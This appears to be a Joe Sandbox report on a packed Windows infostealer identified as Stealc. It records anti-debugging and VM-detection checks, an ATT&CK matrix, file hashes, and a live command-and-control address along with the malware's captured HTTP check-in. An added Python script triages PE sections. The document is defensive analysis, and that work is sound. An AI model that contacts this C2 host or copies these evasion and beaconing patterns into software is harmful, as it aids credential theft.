                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00BB38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BB4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00BADA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00BAE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00BAED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00BB4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BAF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00BB3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BA16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BADE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00BABE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA1160 GetSystemInfo,ExitProcess,0_2_00BA1160
                Source: file.exe, file.exe, 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2194021053.00000000013EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareQ(
                Source: file.exe, 00000000.00000002.2194021053.00000000013EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2194021053.000000000146C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.2194021053.0000000001438000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13637
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13640
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13652
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13692
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13656
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA45C0 VirtualProtect ?,00000004,00000100,000000000_2_00BA45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00BB9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB9750 mov eax, dword ptr fs:[00000030h]0_2_00BB9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00BB78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2324, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00BB9600
                Source: file.exe, file.exe, 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: CGTProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00BB7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00BB7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00BB7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00BB7A30

                Stealing of Sensitive Information

                Source: Yara matchFile source: 0.2.file.exe.ba0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2194021053.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2152337269.0000000005100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2324, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara matchFile source: 0.2.file.exe.ba0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2194021053.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2152337269.0000000005100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2324, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (techniques listed per tactic, in the matrix's row order; a number in front of a technique is the count badge printed in that cell, reproduced as shown; cells without a badge are the matrix's unmatched template entries)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Command and Scripting Interpreter; 11 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Antivirus, Machine Learning and Genetic Malware Detection (Source; Detection; Scanner; Label)

Initial sample:
• file.exe; 100%; Avira; TR/Crypt.TPM.Gen
• file.exe; 100%; Joe Sandbox ML
Dropped files: No Antivirus matches
Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches
URLs:
• http://185.215.113.37/; 100%; URL Reputation; malware
• http://185.215.113.37; 100%; URL Reputation; malware
• http://185.215.113.37/e2b1563c6670f193.php; 100%; URL Reputation; malware
                No contacted domains info
Contacted URLs (Name; Malicious; Antivirus Detection; Reputation)
• http://185.215.113.37/; true; URL Reputation: malware; unknown
• http://185.215.113.37/e2b1563c6670f193.php; true; URL Reputation: malware; unknown
URLs from Memory and Binaries (Name; Source; Malicious; Antivirus Detection; Reputation). The strings are reproduced exactly as extracted from process memory; the odd characters that follow ".php" or the host ("phpl", "php3", "37W" and so on) are most likely bytes adjacent to the string in memory rather than part of the URL, so the distinct indicators here are the host and the /e2b1563c6670f193.php path already listed above.
• http://185.215.113.37/e2b1563c6670f193.phpl; file.exe, 00000000.00000002.2194021053.000000000146C000.00000004.00000020.00020000.00000000.sdmp; true; (none); unknown
• http://185.215.113.37/?; file.exe, 00000000.00000002.2194021053.000000000144D000.00000004.00000020.00020000.00000000.sdmp; true; (none); unknown
• http://185.215.113.37; file.exe, 00000000.00000002.2194021053.00000000013EE000.00000004.00000020.00020000.00000000.sdmp; true; URL Reputation: malware; unknown
• http://185.215.113.37/ws; file.exe, 00000000.00000002.2194021053.000000000144D000.00000004.00000020.00020000.00000000.sdmp; true; (none); unknown
• http://185.215.113.37W; file.exe, 00000000.00000002.2194021053.00000000013EE000.00000004.00000020.00020000.00000000.sdmp; true; (none); unknown
• http://185.215.113.37/e2b1563c6670f193.php3; file.exe, 00000000.00000002.2194021053.0000000001465000.00000004.00000020.00020000.00000000.sdmp; true; (none); unknown
• http://185.215.113.37/e2b1563c6670f193.phps; file.exe, 00000000.00000002.2194021053.0000000001465000.00000004.00000020.00020000.00000000.sdmp; true; (none); unknown
• http://185.215.113.37/e2b1563c6670f193.phpX; file.exe, 00000000.00000002.2194021053.0000000001459000.00000004.00000020.00020000.00000000.sdmp; true; (none); unknown
• http://185.215.113.37/e2b1563c6670f193.phpg; file.exe, 00000000.00000002.2194021053.0000000001465000.00000004.00000020.00020000.00000000.sdmp; true; (none); unknown
Contacted IPs (IP; Domain; Country; ASN; ASN Name; Malicious)
• 185.215.113.37; unknown; Portugal; 206894; WHOLESALECONNECTIONSNL; true
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1528463
                                Start date and time:2024-10-07 23:22:07 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 4m 52s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:6
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 19
                                • Number of non-executed functions: 86
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: file.exe
                                No simulations
Context: IP. Earlier analyses that contacted 185.215.113.37 (Associated Sample Name; Detection; Threat Name; Context; the report's "Get hash" and "Browse" links are omitted):
• file.exe; malicious; Stealc; 185.215.113.37/e2b1563c6670f193.php
• file.exe; malicious; Stealc, Vidar; 185.215.113.37/e2b1563c6670f193.php
• file.exe; malicious; Stealc; 185.215.113.37/e2b1563c6670f193.php
• file.exe; malicious; Stealc; 185.215.113.37/e2b1563c6670f193.php
• file.exe; malicious; Stealc, Vidar; 185.215.113.37/e2b1563c6670f193.php
• file.exe; malicious; Stealc; 185.215.113.37/e2b1563c6670f193.php
• file.exe; malicious; Stealc, Vidar; 185.215.113.37/e2b1563c6670f193.php
• file.exe; malicious; Stealc; 185.215.113.37/e2b1563c6670f193.php
• file.exe; malicious; Stealc; 185.215.113.37/e2b1563c6670f193.php
• xwZfYpo16i.exe; malicious; LummaC, Amadey, Credential Flusher, Stealc; 185.215.113.37/e2b1563c6670f193.php
                                No context
Context: ASN. Earlier analyses that contacted WHOLESALECONNECTIONSNL (Associated Sample Name; Detection; Threat Name; Context):
• file.exe; malicious; Stealc; 185.215.113.37
• file.exe; malicious; Stealc, Vidar; 185.215.113.37
• file.exe; malicious; Stealc; 185.215.113.37
• file.exe; malicious; Stealc; 185.215.113.37
• file.exe; malicious; Stealc, Vidar; 185.215.113.37
• file.exe; malicious; Stealc; 185.215.113.37
• file.exe; malicious; Stealc, Vidar; 185.215.113.37
• file.exe; malicious; Stealc; 185.215.113.37
• file.exe; malicious; Stealc; 185.215.113.37
• xwZfYpo16i.exe; malicious; LummaC, Amadey, Credential Flusher, Stealc; 185.215.113.103
                                No context
                                No context
                                No created / dropped files found
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.947078666482964
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'853'440 bytes
                                MD5:c6761f44bbab998af58149acb8f7a920
                                SHA1:b37887456c6ebb6619f8c120bc6d7fd31f80ad27
                                SHA256:b1ac855c1055c03377a9b3b00f2d967f0bd6f6066a9215df60e951bd45741c8f
                                SHA512:9828a7addd7cf9747a94a62b00b3d5df754b0418838bf4752b5c5499879746baff23604411ee22ce1650184e339c989442ae79bde2b05e32255e33619413fdbf
                                SSDEEP:49152:/j9uXVDKh17nk1gO98pWbTXqPGHr4Jv79yM3YV:QmAgO9mW3XR4tt3A
                                TLSH:FB8533471DED68ABC0510DFFD06F43B7B749F171CED1818AA80A9F64C9DB846C5A8CA8
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                                Icon Hash:00928e8e8686b000
                                Entrypoint:0xaa1000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                Instruction
                                jmp 00007F5AD87B2BEAh
                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319
Data directories (Name; Virtual Address; Virtual Size; Is in Section)
• IMAGE_DIRECTORY_ENTRY_EXPORT; 0x0; 0x0
• IMAGE_DIRECTORY_ENTRY_IMPORT; 0x25d050; 0x64; .idata
• IMAGE_DIRECTORY_ENTRY_RESOURCE; 0x0; 0x0
• IMAGE_DIRECTORY_ENTRY_EXCEPTION; 0x0; 0x0
• IMAGE_DIRECTORY_ENTRY_SECURITY; 0x0; 0x0
• IMAGE_DIRECTORY_ENTRY_BASERELOC; 0x25d1f8; 0x8; .idata
• IMAGE_DIRECTORY_ENTRY_DEBUG; 0x0; 0x0
• IMAGE_DIRECTORY_ENTRY_COPYRIGHT; 0x0; 0x0
• IMAGE_DIRECTORY_ENTRY_GLOBALPTR; 0x0; 0x0
• IMAGE_DIRECTORY_ENTRY_TLS; 0x0; 0x0
• IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG; 0x0; 0x0
• IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT; 0x0; 0x0
• IMAGE_DIRECTORY_ENTRY_IAT; 0x0; 0x0
• IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT; 0x0; 0x0
• IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR; 0x0; 0x0
• IMAGE_DIRECTORY_ENTRY_RESERVED; 0x0; 0x0
Sections (Name; Virtual Address; Virtual Size; Raw Size; MD5; Xored PE; ZLIB Complexity; File Type; Entropy; Characteristics). Two sections have names the report prints as blank (see the "PE file contains section with special chars" signature); the entry point 0xaa1000 (image base 0x400000 + RVA 0x6a1000) is the first byte of .taggant.
• (blank name); 0x1000; 0x25b000; 0x22800; cbb74a99996db503240275a1c0bfdef1; unknown; unknown; unknown; unknown; IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
• .rsrc; 0x25c000; 0x1000; 0x0; d41d8cd98f00b204e9800998ecf8427e (MD5 of empty input); False; 0; empty; 0.0; IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
• .idata; 0x25d000; 0x1000; 0x200; c60c4959cc8d384ac402730cc6842bb0; False; 0.1328125; data; 0.9064079259880791; IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
• (blank name); 0x25e000; 0x2a3000; 0x200; ed0a1bb6a672f5209a246f8af4aed586; unknown; unknown; unknown; unknown; IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
• nwkcdrfe; 0x501000; 0x19f000; 0x19e400; a06def18cfa6f98e15507053da52b7fd; False; 0.9947724143783947; data; 7.953317466464678; IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
• wlorzjea; 0x6a0000; 0x1000; 0x600; c5f433c23eb94a5a675247b08520116e; False; 0.5481770833333334; data; 4.905536567564007; IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
• .taggant; 0x6a1000; 0x3000; 0x2200; e44e98ee60d07cbada4a54dcb100bce6; False; 0.06571691176470588; DOS executable (COM); 0.7750888768816555; IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Imports (DLL; Import)
• kernel32.dll; lstrcpy
A single static import is consistent with the "Extensive use of GetProcAddress" signature: the remaining API is resolved at runtime (the LoadLibraryA/GetProcAddress chain is visible in the execution graph below).
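The static verdicts the report draws from the section table (entry point inside .taggant, writable-and-executable sections, a near-maximum-entropy section, sections that are far larger in memory than on disk) can be reproduced with a few lines of code. The following Python is an added example and is not part of this Joe Sandbox report or of the sample: the section values, image base, entry point and file size are copied from the report, while the thresholds (entropy 7.0, a 4:1 virtual-to-raw ratio, the minimum section size considered) and the list of conventional section names are the example's own assumptions.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Section:
    name: str
    va: int                    # RVA of the section start
    vsize: int                 # virtual size (bytes mapped in memory)
    raw: int                   # raw size (bytes present on disk)
    entropy: Optional[float]   # None where the report prints "unknown"
    execute: bool              # IMAGE_SCN_MEM_EXECUTE
    write: bool                # IMAGE_SCN_MEM_WRITE


# Section table of file.exe as printed in this report; the two sections whose
# names the report shows as blank are stored as "".
SECTIONS: List[Section] = [
    Section("",         0x001000, 0x25b000, 0x022800, None,  True,  True),
    Section(".rsrc",    0x25c000, 0x001000, 0x000000, 0.0,   False, True),
    Section(".idata",   0x25d000, 0x001000, 0x000200, 0.906, False, True),
    Section("",         0x25e000, 0x2a3000, 0x000200, None,  True,  True),
    Section("nwkcdrfe", 0x501000, 0x19f000, 0x19e400, 7.953, True,  True),
    Section("wlorzjea", 0x6a0000, 0x001000, 0x000600, 4.906, True,  True),
    Section(".taggant", 0x6a1000, 0x003000, 0x002200, 0.775, True,  True),
]
IMAGE_BASE = 0x400000
ENTRY_POINT = 0xAA1000          # as reported: image base + RVA
FILE_SIZE = 1_853_440

# Assumed set of conventional section names (not from the report).
STANDARD_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                  ".edata", ".pdata", ".tls", ".bss", ".CRT"}


def section_for_va(va: int, image_base: int, sections: List[Section]) -> Optional[str]:
    """Name of the section whose mapped range contains the virtual address, else None."""
    rva = va - image_base
    for s in sections:
        if s.va <= rva < s.va + s.vsize:
            return s.name
    return None


def rwx_sections(sections: List[Section]) -> List[Section]:
    return [s for s in sections if s.execute and s.write]


def high_entropy_sections(sections: List[Section], threshold: float = 7.0) -> List[str]:
    return [s.name for s in sections if s.entropy is not None and s.entropy >= threshold]


def sum_raw(sections: List[Section]) -> int:
    return sum(s.raw for s in sections)


def triage(sections: List[Section], image_base: int, entry_point: int, file_size: int) -> List[str]:
    """Return human-readable findings; thresholds are assumptions, see lead-in."""
    findings = []
    ep = section_for_va(entry_point, image_base, sections)
    if ep is None:
        findings.append(f"entry point 0x{entry_point:x} lies outside every section")
    elif ep not in STANDARD_NAMES:
        findings.append(f"entry point 0x{entry_point:x} lies in non-standard section {ep!r}")
    for s in rwx_sections(sections):
        findings.append(f"section {s.name!r} is both writable and executable")
    for name in high_entropy_sections(sections):
        findings.append(f"section {name!r} has entropy >= 7.0 (packed or encrypted data)")
    for s in sections:
        # Large sections with little on-disk backing are unpacking targets.
        if s.vsize >= 0x10000 and s.raw * 4 < s.vsize:
            findings.append(f"section {s.name!r} maps 0x{s.vsize:x} bytes but holds 0x{s.raw:x} on disk")
        elif s.raw == 0 and s.vsize > 0:
            findings.append(f"section {s.name!r} is declared but empty on disk")
    outside = file_size - sum_raw(sections)
    findings.append(f"0x{outside:x} bytes of the file are outside section data (headers plus any overlay)")
    return findings


if __name__ == "__main__":
    for line in triage(SECTIONS, IMAGE_BASE, ENTRY_POINT, FILE_SIZE):
        print(line)
```

For this file the raw sizes add up to 0x1c3800, which leaves exactly 0x1000 bytes for the headers and nothing for an overlay, so the packed payload is entirely inside the section data (chiefly nwkcdrfe).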
IDS alert (Suricata)
• Timestamp: 2024-10-07T23:23:07.566582+0200; SID: 2044243; Signature: ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in; Severity: 1; 192.168.2.6:49711 -> 185.215.113.37:80 (TCP)
TCP packets (Timestamp; Source IP:Port -> Destination IP:Port)
• Oct 7, 2024 23:23:06.653749943 CEST; 192.168.2.6:49711 -> 185.215.113.37:80
• Oct 7, 2024 23:23:06.659321070 CEST; 185.215.113.37:80 -> 192.168.2.6:49711
• Oct 7, 2024 23:23:06.659445047 CEST; 192.168.2.6:49711 -> 185.215.113.37:80
• Oct 7, 2024 23:23:06.659970045 CEST; 192.168.2.6:49711 -> 185.215.113.37:80
• Oct 7, 2024 23:23:06.664891005 CEST; 185.215.113.37:80 -> 192.168.2.6:49711
• Oct 7, 2024 23:23:07.340713024 CEST; 185.215.113.37:80 -> 192.168.2.6:49711
• Oct 7, 2024 23:23:07.342571020 CEST; 192.168.2.6:49711 -> 185.215.113.37:80
• Oct 7, 2024 23:23:07.345557928 CEST; 192.168.2.6:49711 -> 185.215.113.37:80
• Oct 7, 2024 23:23:07.350513935 CEST; 185.215.113.37:80 -> 192.168.2.6:49711
• Oct 7, 2024 23:23:07.564943075 CEST; 185.215.113.37:80 -> 192.168.2.6:49711
• Oct 7, 2024 23:23:07.566581964 CEST; 192.168.2.6:49711 -> 185.215.113.37:80
• Oct 7, 2024 23:23:10.032208920 CEST; 192.168.2.6:49711 -> 185.215.113.37:80
HTTP sessions with 185.215.113.37 (Session ID; Source IP:Port -> Destination IP:Port; PID; Process)
• 0; 192.168.2.6:49711 -> 185.215.113.37:80; 2324; C:\Users\user\Desktop\file.exe
HTTP request/response pairs (Timestamp; Bytes transferred; Direction)

Oct 7, 2024 23:23:06.659970045 CEST; 89 bytes; OUT
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache

Oct 7, 2024 23:23:07.340713024 CEST; 203 bytes; IN
HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 21:23:07 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Oct 7, 2024 23:23:07.345557928 CEST; 412 bytes; OUT
POST /e2b1563c6670f193.php HTTP/1.1
